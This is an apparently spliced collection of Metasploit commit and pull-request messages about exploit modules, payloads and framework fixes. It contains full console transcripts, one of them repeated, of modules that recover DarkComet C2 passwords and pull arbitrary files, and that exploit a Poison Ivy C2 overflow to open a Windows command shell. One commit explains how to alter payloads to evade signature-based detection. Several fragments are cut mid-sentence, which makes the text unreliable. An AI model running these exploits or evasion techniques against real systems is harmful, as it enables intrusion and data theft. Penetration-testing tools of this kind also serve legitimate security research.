These modules call check() in the exploit() function and expected to get a CheckCode::Vulnerable, now that check() returns Appears instead of Vulnerable they always refuse to run.
I've flipped the logic, based on examples in other modules, now they refuse to run only if check() positively returns Safe.
Fixes#6983. When the auxiliary/scanner/http/http_login module discovers a successful basic auth user+password combination, make sure we properly store the password by specifically telling the credentials gem that the private data we're storing is a :password.
This patch fixes a problem when the module is used against an older
version of ninja forms (such as 2.9.27), the nonce is found in a
hidden input instead of the JavaScript code, which actually causes
an undefined method 'gsub' bug in the module.
use a convience method to DRY up creation
of the SSHFactory inside modules. This will make it easier
to apply changes as needed in future. Also changed msframework attr
to just framework as per our normal convention
ActionPack versions prior to,, and
implement unsafe dynamic rendering of inline content such that
passing ERB wrapped Ruby code leads to remote execution.
This module only implements the Ruby payloads, but can easily
be extended to use system calls to execute native/alternate
payload types as well.
Test Procedures:
Run bundle install to match gem versions to those in lockfile
Run the rails server and configure the metasploit module:
Set TARGETURI to /exploits
Configure payload and handler options
Execute the module, move on to post-exp
This is necessary when payload is a generic/* since we can't actually
figure out what we need the prefix/suffix to be because the generics are
a pain to extract the arch/platform info out of.
Also remove some unnecessary options.
Payload generation now only occurs once and function 'setup_pay'
removed. Payload is generated with cmd_psh_payload and is mutated to
fit dropped text file.
removed vendored net::ssh
pulled in net:ssh gem
made Rex::Socket::SSHFactory clas to bridge rex sockets in
Renamed getpeername to getpeername-as_array to not override
core socket behaviour
MS16-032 ps1 moved to external file. This ps1 will now detect windir
to find cmd.exe. The module now also detects windir to find
powershell.exe. The license is now BSD_LICENSE, and the required
copyright has been moved to the ps1. The previous optional cleanup stage
is now standard. The optional 'W_PATH' assignment is corrected to
select the user's variable unless 'W_PATH' is nil.
This module will use the powershell port of ms16-032 created by
@FuzzySec. All payloads are pushed to a compress powershell script in a
plain text file on the disk to execute.
As the "is_admin?" function only checks if the current session effectively has admin rights, I offer to add a check to know if the current user is in the local admin group using the "is_in_admin_group?" function. This information is better suited to check if admin rights are obtainable using the "bypassuac" module.
( which allows
an attacker to download arbitrary files from the DarkComet C2. The vulnerability possibly affects versions
prior to 3.2 as well. The vulnerability can be exploited without knowledge of the shared secret key
by abusing a flaw in the cryptographic protocol to carry out a limited version of the exploit allowing
for key recovery, after which the exploit can be used to download arbitrary files from a DarkComet C2 server.
for details.
for the DarkComet 5.3.1 C2 server / builder
for the DarkComet 4.2F C2 server / builder (archive password is 'tr')
## Console output
Below is an example of the exploit running against versions 5.3.1 and 4.2F
(DarkComet C2 server password is set to 'darkcometpass' and unknown to attacker).
### Version 5.3.1 (unknown password)
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts
KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST yes This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST yes The target address
RPORT 1604 yes The target port
STORE_LOOT true no Store file in loot (will simply output file to console if set to false).
TARGETFILE no Target file to download (assumes password is set)
msf auxiliary(darkcomet_filedownloader) > set RHOST
msf auxiliary(darkcomet_filedownloader) > set LHOST
msf auxiliary(darkcomet_filedownloader) > run
[*] - C2 server uses password [darkcometpass]
[*] - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC51#-890darkcometpass
KEY => #KCMDDC51#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run
[*] - omgsecret
[*] Auxiliary module execution completed
### Version 4.2F (unknown password)
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts
KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST yes This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST yes The target address
RPORT 1604 yes The target port
STORE_LOOT true no Store file in loot (will simply output file to console if set to false).
TARGETFILE no Target file to download (assumes password is set)
msf auxiliary(darkcomet_filedownloader) > set RHOST
msf auxiliary(darkcomet_filedownloader) > set LHOST
msf auxiliary(darkcomet_filedownloader) > set NEWVERSION false
msf auxiliary(darkcomet_filedownloader) > run
[*] - Missing 1 bytes of keystream ...
[*] - Initiating brute force ...
[*] - C2 server uses password [darkcometpass]
[*] - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC42F#-890darkcometpass
KEY => #KCMDDC42F#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run
[*] - omgsecret
[*] Auxiliary module execution completed
replaced "$1" on line 51 with "Regexp.last_match(1)
restructed the print statement on line 56 to more closely match suggestion
removed "self." from line 71
changed line 78 to loop for 2 seconds insetead of 1 second
(, possibly affecting
earlier versions as well. The vulnerability can be exploited without knowledge of the secret key
by abusing a flaw in the cryptographic protocol to carry out a limited version of the exploit allowing
for key recovery after which the exploit can be used to download arbitrary files from a DarkComet C2 server.
for details.
## Console output
Below is an example of the exploit running against versions 5.3.1 and 4.2F
(DarkComet C2 server password is set to 'darkcometpass' and unknown to attacker).
### Version 5.3.1 (unknown password)
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts
KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST yes This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST yes The target address
RPORT 1604 yes The target port
STORE_LOOT true no Store file in loot (will simply output file to console if set to false).
TARGETFILE no Target file to download (assumes password is set)
msf auxiliary(darkcomet_filedownloader) > set RHOST
msf auxiliary(darkcomet_filedownloader) > set LHOST
msf auxiliary(darkcomet_filedownloader) > run
[*] - C2 server uses password [darkcometpass]
[*] - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC51#-890darkcometpass
KEY => #KCMDDC51#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run
[*] - omgsecret
[*] Auxiliary module execution completed
### Version 4.2F (unknown password)
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts
KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST yes This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST yes The target address
RPORT 1604 yes The target port
STORE_LOOT true no Store file in loot (will simply output file to console if set to false).
TARGETFILE no Target file to download (assumes password is set)
msf auxiliary(darkcomet_filedownloader) > set RHOST
msf auxiliary(darkcomet_filedownloader) > set LHOST
msf auxiliary(darkcomet_filedownloader) > set NEWVERSION false
msf auxiliary(darkcomet_filedownloader) > run
[*] - Missing 1 bytes of keystream ...
[*] - Initiating brute force ...
[*] - C2 server uses password [darkcometpass]
[*] - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC42F#-890darkcometpass
KEY => #KCMDDC42F#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run
[*] - omgsecret
[*] Auxiliary module execution completed
in Poison Ivy versions 2.1.x (possibly present in older versions too) and doesn't
require knowledge of the secret key as it abuses a flaw in the cryptographic protocol.
Note that this is a different vulnerability from the one affecting versions 2.2.0 and up
for details.
## Console output
Below is an example of the exploit running against a 2.1.4 C2 server (PIVY C2 server password is
set to 'pivypass' and unknown to attacker).
### Version 2.1.4
msf > use windows/misc/poisonivy_21x_bof
msf exploit(poisonivy_21x_bof) > set RHOST
msf exploit(poisonivy_21x_bof) > check
[*] The target appears to be vulnerable.
msf exploit(poisonivy_21x_bof) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(poisonivy_21x_bof) > exploit
[*] - Performing handshake...
[*] Started bind handler
[*] - Sending exploit...
[*] Command shell session 1 opened ( -> at 2016-06-03 12:34:02 -0400
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.1.4\Poison Ivy 2.1.4>
This scanner module doesn't tell you the location of the found information. So when using the -R option to fill the RHOSTS all you get is a bunch of successful findings, however you won't know to which systems they belong.
Added exploit for HP Data Protector when using encrypted communications.
This has been tested against v9.00 on Windows Server 2008 R2 but should also work against older versions of DP.
When a module uses the HttpClient mixin but registers the USERNAME
and PASSWORD datastore options in order to perform a form auth,
it ruins the ability to also perform a basic auth (sometimes it's
possible to see both). To avoid option naming conflicts, basic auth
Using the ruby methods for generating assembly blocks defined or
separated in prior commits, create a new payload from the existing
assembly blocks which performs a DNS lookup of the LHOST prior to
establishing a corresponding socket and downloading, and
decrypting the RC4 encrypted payload.
For anyone looking to learn how to build these payloads, these
three commits should provide a healthy primer. Small changes to
the payload structure can yield entropy enough to avoid signature
based detection by in-line or out-of-band static defenses. This
payload was completed in the time between this commit and the last.
Update payload sizes when this branch is "complete"
Ensure UUIDs and adjacent black magic all work properly
Using the separation of block_recv and reverse_tcp, implement
reverse_tcp_dns using original shellcode as template with dynamic
injection of parameters. Concatenate the whole thing in the
generation call chain, and compile the resulting shellcode for
Metasploit module pruned to bare minimum, with the LHOST OptString
moved into the library component.
Update payload sizes when this branch is "complete"
Ensure UUIDs and adjacent black magic all work properly
Clean up rc4.rb to use the rc4_keys method when generating a
stage. Makes the implementation far more readable and reduces
redundant code.
Convert reverse_tcp_rc4 and bind_tcp_rc4 from static shellcode
substitution payloads to metasm compiled assembly approach.
Splits up metasm methods for bind_tcp and reverse_tcp into socket
creation and block_recv to allow for reuse of the socket methods
with the RC4 payloads, while substituting the block_recv methods
for those carrying the appropriate decryptor stubs.
Creates a new rc4 module carrying the bulk of the decryptor and
adjacent convenince methods for standard payload generation.
Tested against Win2k8r2, Win7x64, and WinXPx86
Ensure all the methods around payload sizing, UUIDs, and other
new functionality, the semantics of which i do not yet fully
understand, are appropriate and do not introduce breakage.